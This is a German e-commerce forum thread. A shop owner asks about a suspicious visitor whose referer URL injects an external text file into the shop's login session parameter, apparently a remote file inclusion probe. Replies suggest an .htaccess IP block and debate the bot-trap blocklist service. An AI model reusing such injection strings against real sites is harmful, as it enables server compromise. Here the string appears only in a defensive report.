Jump to content
xt:Commerce Community Forum

Seltsamer Gast im Shop

kindspech

Recommended Posts

Heute war ein seltsamer Gast online:

IP-Adresse koreanisch

Referer URL: /login.php?XTCsid=http://www.zoo-metelen.de/sender.txt?&server=www.kindspech.de/login.php?XTCsid=&[email protected]

Was heisst denn das? hat der Zoo Metelen einen Newsletter verschickt? die Google-Mailadresse hab ich ge-xxx-t, da steht eine richtige drin...

Viele Grüße

Natascha

Guest tuvalu

wie funktioniert das Sperren eigentlich??

An die .htaccess im root-Verzeichnis des Shops folgendes anhängen:

deny from 61.142.80.108

My2Cent

tuvalu

Hallo Natascha :D,

hast Du Dir mal bot-trap angesehen.

Da sind die meisten dieser IP´s schon gesperrt.

Findest Du in Deinem Shop eine neue, meldest Du die an bot-trap und bei allen, die bot-trap nutzen,bleibt der Spammer draußen.

Grüße

Vio

Hi Vio!

War das nicht die Geschichte, wo man sich im Forum vorstellen muss usw. ???

Ich denke aber, ich könnte das wirklich mal in Angriff nehmen.. Ich finde es nicht gerade lustig, Hacker in meinem Shop bzw. vor der Shoptüre zu haben..

Viele Grüße :D

Natascha

Guest tuvalu

hast Du Dir mal bot-trap angesehen.

Da sind die meisten dieser IP´s schon gesperrt.

Findest Du in Deinem Shop eine neue, meldest Du die an bot-trap und bei allen, die bot-trap nutzen,bleibt der Spammer draußen.

Das gilt nur für Bots, nicht für Menschen. Menschen können die Sperre umgehen.

Außerdem - und das ist bei Bot-Trap systembedingt - wird eine Sperr-IP-Liste von jemand anderem geführt, es hat also jemand anderer Gewalt über den Zugang zu meinem Shop - und mit dem habe ich nicht mal einen rechtsgültigen Vertrag. Sind die also der Meinung, die Telekom sei böse, warum auch immer, vielleicht weil sie Aktien von denen haben und die sind wieder mal gefallen, und sperren den Zugang, merkt man das höchstens an der geringeren Zahl der Bestellungen. Nicht, dass ich Bot-Trap etwas böses unterstellen will. Gab es aber schon alles mal.

My2Cent

tuvalu

Das gilt nur für Bots, nicht für Menschen. Menschen können die Sperre umgehen.

Außerdem - und das ist bei Bot-Trap systembedingt - wird eine Sperr-IP-Liste von jemand anderem geführt, es hat also jemand anderer Gewalt über den Zugang zu meinem Shop - und mit dem habe ich nicht mal einen rechtsgültigen Vertrag. Sind die also der Meinung, die Telekom sei böse, warum auch immer, vielleicht weil sie Aktien von denen haben und die sind wieder mal gefallen, und sperren den Zugang, merkt man das höchstens an der geringeren Zahl der Bestellungen. Nicht, dass ich Bot-Trap etwas böses unterstellen will. Gab es aber schon alles mal.

My2Cent

tuvalu

Therotisch ist das vielleicht möglich, habe aber bisher keine Klagen über bot-trap gehört. Wo gab es das schon mal? Außerdem kann das script auch manuell eingepflegt werden, so dass kein Zugriff von außen möglich sein soll (http://www.bot-trap.de/home/pages/faq.php)

Sicherlich sollte sich jeder vorher genau informieren und dann abwägen.

Grüße

Vio

Archived

This topic is now archived and is closed to further replies.

• Create New...